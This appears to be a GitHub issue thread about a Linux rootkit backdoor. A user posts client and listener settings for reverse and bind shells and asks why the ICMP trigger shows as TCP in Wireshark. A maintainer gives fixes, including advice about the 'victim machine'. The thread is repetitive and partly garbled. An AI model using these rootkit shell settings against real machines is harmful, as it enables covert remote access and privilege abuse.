You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
server shell : ./client
set LHOST 192.168.129
set LPORT 4444
set SRCHOST 192.168.22.2
set SRCPORT 11
set RHOST 192.168.21.130
set RPORT 4445
set PORT ICMP
set PASS s3cr3t
set TOKEN hax0r
and type!! run !
** it perfectly run well but in the wireshark show TCP 4444 not a ICMP **
------------------bind shell----------------
how i can get a bind shell??? server shell : ./listener -p 3333 -s s3cr3t
attackershell : There is no response even when you type the command.
summary
"revershell not work icmp backdoor" it shows tcp
how i use bind shell???
is there any wiki??? about this issue??
thank you for reading.
i wait your reply.
The text was updated successfully, but these errors were encountered:
Use TCP as protocol instead of ICMP.
No need to run the listener program on the victim machine if you got the module loaded.
Make SRCHOST be the same as LHOST
hello. i finally install all!!!
I am not good at English, so please understand it.
I test in kali-64bit-amd and it work perfect at hiding a process and get a root.
but how i can get a bind shell???
attacker ip : 192.168.21.129
server ip : 192.168.21.130
--------------------reverse shell----------------------------------------------------
attacker shell : ./listener -p 4444 -s s3cr3t
server shell : ./client
set LHOST 192.168.129
set LPORT 4444
set SRCHOST 192.168.22.2
set SRCPORT 11
set RHOST 192.168.21.130
set RPORT 4445
set PORT ICMP
set PASS s3cr3t
set TOKEN hax0r
** it perfectly run well but in the wireshark show TCP 4444 not a ICMP **
------------------bind shell----------------
how i can get a bind shell???
server shell : ./listener -p 3333 -s s3cr3t
attackershell : There is no response even when you type the command.
summary
thank you for reading.
i wait your reply.
The text was updated successfully, but these errors were encountered: